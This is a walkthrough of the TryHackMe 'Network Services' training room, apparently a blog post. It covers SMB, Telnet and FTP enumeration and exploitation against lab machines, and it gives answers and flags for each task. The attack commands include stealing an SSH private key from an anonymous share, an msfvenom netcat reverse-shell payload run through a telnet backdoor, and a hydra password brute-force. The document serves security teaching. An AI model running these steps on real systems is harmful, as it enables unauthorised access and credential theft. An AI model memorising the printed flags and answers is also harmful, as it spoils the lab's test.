TryHackMe | Network Services 1 Walkthrough
Hi there, I’m glad to see you here. In this article, we’ll examine together the “Network Services” room in TryHackMe (Cyber Defense Learning Path). In some sections, I’ll share brief about the subject. Don’t forget! You must always research to learn more. I hope it will be helpful for you. Let’s start!
Contents:
-Cyber Defense Introduction | Network Services 1
- Understanding SMB
- Enumerating SMB
- Exploiting SMB
- Understanding Telnet
- Enumerating Telnet
- Exploiting Telnet
- Understanding FTP
- Enumerating FTP
- Exploiting FTP
Cyber Defense Introduction | Network Services 1
Understanding SMB
Server Message Block Protocol — is a client-server communication protocol used for sharing access to files, printers, serial ports and other resources on a network.
-The SMB protocol is known as a response-request protocol, meaning that it transmits multiple messages between the client and server to establish a connection.
Q1: What does SMB stand for?
A1: Server Message Block
Q2: What type of protocol is SMB?
A2: response-request
Q3: What do clients connect to servers using?
A3: TCP/IP
Q4: What systems does Samba run on?
A4: Unix
Enumerating SMB
Enumeration is the process of gathering information on a target in order to find potential attack vectors and aid in exploitation.
Enum4linux is a tool used to enumerate SMB shares on both Windows and Linux systems.
The syntax of Enum4Linux is nice and simple: “enum4linux [options] ip”
-U: get userlist
-M: get machine list
-N: get namelist dump (different from -U and-M)
-S: get sharelist
-P: get password policy information
-G: get group and member list
-a: all of the above (full basic enumeration)
Q1: Conduct an nmap scan of your choosing, How many ports are open?
A1: 3
Q2: What ports is SMB running on?
A2: 139/445
Q3: Let’s get started with Enum4Linux, conduct a full basic enumeration. For starters, what is the workgroup name?
A3: WORKGROUP
Command: enum4linux –a 10.10.144.145
Q4: What comes up as the name of the machine?
A4: POLOSMB
Q5: What operating system version is running?
A5: 6.1
Q6: What share sticks out as something we might want to investigate?
A6: profiles
Exploiting SMB
Samba is an implementation of the SMB/CIFS protocol for Unix systems, providing support for cross-platform file and printer sharing with Microsoft Windows, OS X, and other Unix systems.
smbclient is ftp-like client to access SMB/CIFS resources on servers.
-U [name] : to specify the user
-p [port] : to specify the port
Q1: What would be the correct syntax to access an SMB share called “secret” as user “suit” on a machine with the IP 10.10.10.2 on the default port?
A1: smbclient //10.10.10.2/secret -U suit -p 445
Q2: Great! Now you’ve got a hang of the syntax, let’s have a go at trying to exploit this vulnerability. You have a list of users, the name of the share (smb) and a suspected vulnerability.
A2: No answer needed
Q3: Lets see if our interesting share has been configured to allow anonymous access, I.E it doesn’t require authentication to view the files. We can do this easily by:
-using the username “Anonymous”
-connecting to the share we found during the enumeration stage
-and not supplying a password.
Does the share allow anonymous access? Y/N?
A3: Y
Note: You can use the help parameter to see all the commands you can use.
Q4: Great! Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?
A4: John Cactus
Q5: What service has been configured to allow him to work from home?
A5: ssh
Q6: Okay! Now we know this, what directory on the share should we look in?
A6: .ssh
Q7: This directory contains authentication keys that allow a user to authenticate themselves on, and then access, a server. Which of these keys is most useful to us?
A7: id_rsa
Q8: Download this file to your local machine, and change the permissions to “600” using “chmod 600 [file]”.
Now, use the information you have already gathered to work out the username of the account. Then, use the service and key to log-in to the server.
What is the smb.txt flag?
A8: THM{smb_is_fun_eh?}
Step 1: Get id_rsa file using get command.
Step 2: Change file permission using chmod command.
In Unix-like operating systems, the chmod command is used to change the access mode of a file.
Step 3: We already know the username. Let’s do this!
Step 4: Connect via SSH using the id_rsa file and get the flag.
Congratulations! You found the flag.
Understanding Telnet
Telnet is a network protocol used to virtually access a computer and to provide a two-way, collaborative and text-based communication channel between two machines.
-Telnet sends all messages in clear text and has no specific security mechanisms. Thus, in many applications and services, Telnet has been replaced by SSH in most implementations.
-You can connect to a telnet server with the following syntax: “telnet [ip] [port]”
Q1: What is Telnet?
A1: application protocol
Q2: What has slowly replaced Telnet?
A2: ssh
Q3: How would you connect to a Telnet server with the IP 10.10.10.3 on port 23?
A3: telnet 10.10.10.3 23
Q4: The lack of what, means that all Telnet communication is in plaintext?
A4: encryption
Enumerating Telnet
Enumeration is the process of gathering information on a target in order to find potential attack vectors and aid in exploitation.
Q1: How many ports are open on the target machine?
A1: 1
Q2: What port is this?
A2: 8012
Q3: This port is unassigned, but still lists the protocol it’s using, what protocol is this?
A3: tcp
Q4: Now re-run the nmap scan, without the -p- tag, how many ports show up as open?
A4: 0
Q5: Here, we see that by assigning telnet to a non-standard port, it is not part of the common ports list, or top 1000 ports, that nmap scans. It’s important to try every angle when enumerating, as the information you gather here will inform your exploitation stage.
A5: No answer needed
Q6: Based on the title returned to us, what do we think this port could be used for?
A6: a backdoor
Q7: Who could it belong to? Gathering possible usernames is an important step in enumeration.
A7: Skidy
Q8: Always keep a note of information you find during your enumeration stage, so you can refer back to it when you move on to try exploits.
A8: No answer needed
Exploiting Telnet
While starting:
-You can connect to a telnet server with the following syntax:
telnet [ip] [port]
A shell can simply be described as a piece of code or program which can be used to gain code or command execution on a device.
A reverse shell is a type of shell in which the target machine communicates back to the attacking machine. The attacking machine has a listener port on which it receives the connection, which by using, code or command execution is achieved.
Q1: Okay, let’s try and connect to this telnet port! If you get stuck, have a look at the syntax for connecting outlined above.
A1: No answer needed
Q2: Great! It’s an open telnet connection! What welcome message do we receive?
A2: SKIDY’S BACKDOOR.
Q3: Let’s try executing some commands, do we get a return on any input we enter into the telnet session? (Y/N)
A3: N
Q4: Hmm… that’s strange. Let’s check to see if what we’re typing is being executed as a system command.
A4: No answer needed
Q5: Start a tcpdump listener on your local machine.
If using your own machine with the OpenVPN connection, use:
sudo tcpdump ip proto \\icmp -i tun0If using the AttackBox, use:
sudo tcpdump ip proto \\icmp -i eth0This starts a tcpdump listener, specifically listening for ICMP traffic, which pings operate on.
A5: No answer needed
tcpdump is a data-network packet analyzer computer program that runs under a command line interface.
Q6: Now, use the command “ping [local THM ip] -c 1” through the telnet session to see if we’re able to execute system commands. Do we receive any pings? Note, you need to preface this with .RUN (Y/N)
A6: Y
Q7: Great! This means that we are able to execute system commands AND that we are able to reach our local machine. Now let’s have some fun!
A7: No answer needed
Q8: We’re going to generate a reverse shell payload using msfvenom.This will generate and encode a netcat reverse shell for us. Here’s our syntax:
msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 Rmsfvenom is the combination of payload generation and encoding.
-p : payload
lhost : our local host IP address (this is your machine’s IP address)
lport : the port to listen on (this is the port on your machine)
R : export the payload in raw format
What word does the generated payload start with?
A8: mkfifo
Q9: Perfect. We’re nearly there. Now all we need to do is start a netcat listener on our local machine. We do this using:
nc -lvp [listening port]netcat or nc is a utility tool that uses TCP and UDP connections to read and write in a network.
-l : listen mode
-v : verbose mode
-p : local port
What would the command look like for the listening port we selected in our payload?
A9: nc -lvp 4444
Q10: Great! Now that’s running, we need to copy and paste our msfvenom payload into the telnet session and run it as a command. Hopefully- this will give us a shell on the target machine!
A10: No answer needed
Q11: Success! What is the contents of flag.txt?
A11: THM{y0u_g0t_th3_t3ln3t_fl4g}
Congratulations! You found the flag.
Understanding FTP
The File Transfer Protocol (FTP) is a standard communication protocol used for the transfer of computer files from a server to a client on a computer network.
-FTP is built on a client–server model architecture using separate control and data connections between the client and the server.
Q1: What communications model does FTP use?
A1: client-server
Q2: What’s the standard FTP port?
A2: 21
Q3: How many modes of FTP connection are there?
A3: 2
Enumeration FTP
Enumeration is the process of gathering information on a target in order to find potential attack vectors and aid in exploitation.
Q1: Run an nmap scan of your choice. How many ports are open on the target machine?
A1: 2
Q2: What port is ftp running on?
A2: 21
Q3: What variant of FTP is running on it?
A3: vsftpd
Q4: Great, now we know what type of FTP server we’re dealing with we can check to see if we are able to login anonymously to the FTP server. We can do this using by typing “ftp [IP]” into the console, and entering “anonymous”, and no password when prompted.
What is the name of the file in the anonymous FTP directory?
A4: PUBLIC_NOTICE.txt
Q5: What do we think a possible username could be?
A5: mike
Q6: Great! Now we’ve got details about the FTP server and, crucially, a possible username. Let’s see what we can do with that…
A6: No answer needed
Exploiting FTP
Q1: What is the password for the user “mike”?
A1: password
Hydra is a parallelized login cracker which supports numerous protocols to attack.
hydra -t 4 -l mike -P <wordlist> -vv 10.10.129.96 ftp-t : run TASKS number of connects in parallel per target
-l : login with LOGIN name
-P : load several passwords from FILE
-vv : verbose mode
[machine IP] : the IP address of the target machine
ftp / protocol : sets the protocol
Q2: Bingo! Now, let’s connect to the FTP server as this user using “ftp [IP]” and entering the credentials when prompted
A2: No answer needed
Q3: What is ftp.txt?
A3: THM{y0u_g0t_th3_ftp_fl4g}
Congratulations! You found the flag.
Thank you for your time. See you soon! Until that time.. Happy Hacking ❤
Resources:
https://www.kali.org/tools/samba/#smbclient
https://www.ssh.com/academy/ssh/protocol
https://www.techtarget.com/searchnetworking/definition/Telnet
https://resources.infosecinstitute.com/topic/icmp-reverse-shell
https://en.wikipedia.org/wiki/Tcpdump
https://www.geeksforgeeks.org/introduction-to-netcat
https://docs.metasploit.com/docs/using-metasploit/basics/how-to-use-msfvenom.html
